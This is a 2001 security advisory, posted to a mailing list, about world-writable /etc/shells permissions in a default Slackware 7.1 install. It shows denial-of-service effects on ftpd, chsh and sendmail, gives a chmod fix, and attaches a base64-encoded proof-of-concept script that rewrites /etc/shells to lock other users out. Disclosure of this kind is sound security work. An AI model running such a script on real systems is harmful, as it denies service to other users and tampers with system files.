Date: Mon, 11 Jun 2001 10:15:27 GMT
From: recidjvo <[email protected]>
To: [email protected]Subject: [PkC] Advisory #005: Default Slackware 7.1 installation /etc/shells perms bug
--=_0_30045_992254527
Content-Type: text/plain; format=flowed; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
/* pkc005.txt */
-=[ SECURITY ADVISORY #005 ]=-
_____________ _______
| \ [www.pkcrew.org] / \
\ | ______ / ___ \
| | |_ _| ___ | / \___|
| | | | / _| | |
| _______/ | | / / | |
| / | _ < | | ___
| | [PkC] | | \ \ | \_____/ |
_| |_ _| |_ \ \_ \ |
|_______| |______| |____| \__________/
[ Packet Knights Crew ]
-=[ SECURITY ADVISORY #005 ]=-
- Vulnerable program: Linux Slackware 7.1 default installation
- Tested on: i386 from official iso image on ftp.slackware.com
- Advisory author: tHE rECIdjVO <[email protected]>
- Group: Packet Knights (http://www.pkcrew.org/)
- Date of release: 06/11/2001
- Problems: /etc/shells installed with world-writable perms.
- Impact: Non-privileged users can create DoS to other users
or increase their access.
- Risk level: MEDIUM-HIGH
- Exploit: Proof-of-concept script attached.
- Dedicated to: My little kitty that was killed. She really loved me.
- Credits: A bad sunday night and my sadness.
- Greetings: (you know if you're here... - and now I can smile.)
- Summary:
There is an error during the default installation of Linux
Slackware 7.1 (tested only for i386 version).
When installing files in /etc, /etc/shells has world-writable
attributes (-rw-rw-rw-), allowing a non privileged user with login
capabilities to misconfigurate the entire system.
- Details:
This can seem a little bug, but impacts can be very dangerous
for the system integrity.
The main problem is that changing data contained in /etc/shells
modifies the behaviour of the glibc call getusershell(3), that is
often used by programs to authenticate a valid account comparing
the shell field in /etc/passwd with shells listed in /etc/shells.
This can cause a denial of service against other users or gaining
higher privileges if attacker has restrictions due to his login shell.
[recidjvo@pkcrew:~]$ ls -l /etc/shells | cut -f1 -d' '
-rw-rw-rw-
Some examples:
(in the following examples recidjvo has a valid shell in
/etc/shells, cyrax doesn't)
1. ftpd
One of the conditions that must be satisfied to successfully
login in ftp mode is that the user must have a valid shell (anonymous
ftp doesn't do this check).
This would mean that we can prevent any user (except user ftp) to log
into the ftp server (or let me in if I couldn't).
[recidjvo@pkcrew:~]$ ftp localhost
Connected to localhost.
220 FTP server (slackware.pkcrew.org) ready.
Name (localhost:recidjvo): cyrax
331 Password required for cyrax.
Password:
530 Login incorrect.
Login failed.
[recidjvo@pkcrew:~]$
(in syslogd output)
pkcrew ftpd[158]: connect from 127.0.0.1
pkcrew ftpd[158]: FTP LOGIN REFUSED (shell not in /etc/shells)
FROM localhost [127.0.0.1], cyrax
2. chsh
chsh(1) is an utility to change users default login shell.
If you're root, you can do anything you want, as usual; but if you're
a simple user, you can only change your login shell by chsh only if
your shell in the /etc/passwd matches a shell in /etc/shells.
[cyrax@pkcrew:~]$ chsh
You may not change the shell for cyrax.
[cyrax@pkcrew:~]$
(in syslogd output)
pkcrew chsh[174]: can't change shell for `cyrax'
3. sendmail
This is not always a complete denial of services, but we can
deny the executions of user-defined commands in the ~/.forward files,
and read informations about user mail attitudes.
If a user has a program in his .forward, he will receive mails no more.
Sendmail checks if the destination user has a valid login shell in
/etc/shells before allowing execution of commands in .forward,
as shown below.
[recidjvo@pkcrew:~]$ mail [email protected] -s '/etc/shells bug'
Have fun :)
t.R.
.
Cc:
/home/cyrax/.forward: line 1: | mailparser... User [email protected]
doesn't have a valid shell for mailing to programs
/home/recidjvo/dead.letter... Saved message in
/home/recidjvo/dead.letter
[recidjvo@pkcrew:~]$
4. Others
I found other programs that can be altered changing
/etc/shells (e.g.: rpc.yppasswdd, gdmlogin, su -from source tree-).
Check out any program that uses getusershell(3) call to authenticate
actions.
- Solution:
If you're root, chmod 644 /etc/shells will resolve
the problem.
If you're a simple user and you're not in love with root, check
your shell to be always in /etc/shells :)
This bug seems to be fixed in the slackware-current branch.
/* pkc005.txt */
--=_0_30045_992254527
Content-Type: application/x-sh; name="ShellsTrunz.sh"
Content-Disposition: attachment; filename="ShellsTrunz.sh"
Content-Transfer-Encoding: base64
IyEgL2Jpbi9iYXNoDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjDQojICAgU2hlbGxzVHJ1
bnogLSAvZXRjL3NoZWxscyBmdHBkIGFuZCBjaHNoIGRlbmlhbCBvZiBzZXJ2aWNlcyAgICAgICAj
DQojICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAjDQojICAgICAgICAgICAgICAgICBieSB0SEUgckVDSWRqVk8gLSByZWNp
ZGp2b0Bwa2NyZXcub3JnICAgICAgICAgICAgICAjDQojICAgICAgICAgICAgICAgICBNZW1iZXIg
b2YgdGhlIFBhY2tldCBLbmlnaHRzICAgICAgICAgICAgICAgICAgICAgICAjDQojICAgICAgICAg
ICAgICAgICBodHRwOi8vd3d3LnBrY3Jldy5vcmcvICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAjDQojICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAjDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQoNClNIRUxMU19GSUxFPS9ldGMvc2hl
bGxzDQpQQVNTV0RfRklMRT0vZXRjL3Bhc3N3ZA0KTkVXX1NIRUxMPS90bXAvYmFzaA0KU0hFTExT
X0JBQ0tVUD0vdG1wLy5zaGVsbHMuYmFrDQoNCmVjaG8gLWUgIlNoZWxsc1RydW56IC0gL2V0Yy9z
aGVsbHMgZnRwZCBhbmQgY2hzaCBsb2NhbCBkZW5pYWwgb2Ygc2VydmljZXMiDQplY2hvIC1lICJi
eSB0SEUgckVDSWRqVk8gLSByZWNpZGp2b0Bwa2NyZXcub3JnXG4iDQoNCmVjaG8gLW5lICItL1wt
IENoZWNraW5nIGlmICRTSEVMTFNfRklMRSBpcyB3cml0YWJsZS4uLiAiDQppZiBbICEgLXcgJFNI
RUxMU19GSUxFIF07IHRoZW4NCgllY2hvIC1lICJuby5cbi0vXC0gRVJST1I6ICRTSEVMTFNfRklM
RSBpcyBub3Qgd3JpdGFibGUgOigiDQoJZWNobyAtZSAiLS9cLSBFeGl0aW5nLiINCglleGl0DQpm
aTsNCg0KQ1A9YHdoaWNoIGNwYA0KQ0hTSD1gd2hpY2ggY2hzaGANClVTRVJOQU1FPWB3aG9hbWlg
DQpPTERfU0hFTEw9YGdyZXAgJFVTRVJOQU1FICRQQVNTV0RfRklMRSB8IGN1dCAtZDogLWY3YA0K
DQplY2hvIC1lICJ5ZXMuXG4tL1wtIFNldCBVU0VSTkFNRSB0byAkVVNFUk5BTUUiDQplY2hvIC1l
ICItL1wtIFNldCBPTERfU0hFTEwgdG8gJE9MRF9TSEVMTFxuIg0KDQplY2hvIC1uZSAiLS9cLSBD
cmVhdGluZyBiYWNrdXAgaW4gJFNIRUxMU19CQUNLVVAuLi4gIg0KJENQIC1wICRTSEVMTFNfRklM
RSAkU0hFTExTX0JBQ0tVUA0KZWNobyAtbmUgImRvbmUuXG4tL1wtIENvcGluZyAkT0xEX1NIRUxM
IGluICRORVdfU0hFTEwuLi4gIg0KJENQIC1wICRPTERfU0hFTEwgJE5FV19TSEVMTA0KZWNobyAt
bmUgImRvbmUuXG4tL1wtIEFkZGluZyBuZXcgc2hlbGwgaW4gJFNIRUxMU19GSUxFLi4uICINCmVj
aG8gLWUgIiRORVdfU0hFTEwiID4+ICRTSEVMTFNfRklMRQ0KZWNobyAtZSAiZG9uZS5cbi0vXC0g
Q2hhbmdpbmcgeW91ciBkZWZhdWx0IHNoZWxsIHRvIGxldCB5b3UgdXNlIGZ0cGQgYW5kIGNoc2gu
ICINCiRDSFNIICRVU0VSTkFNRSAtcyAkTkVXX1NIRUxMDQplY2hvIC1uZSAiLS9cLSBSZW1vdmUg
b3RoZXIgc2hlbGxzIGZyb20gJFNIRUxMU19GSUxFLi4uICINCmVjaG8gLWUgIiRORVdfU0hFTEwi
ID4gJFNIRUxMU19GSUxFDQplY2hvIC1lICJkb25lLlxuIg0KDQplY2hvIC1lICJOb3cgb25seSB5
b3UsIHJvb3QgYW5kIEdvZCBjYW4gdXNlIGZ0cGQgYW5kIGNoc2ggOikiDQpleGl0DQo=
--=_0_30045_992254527--
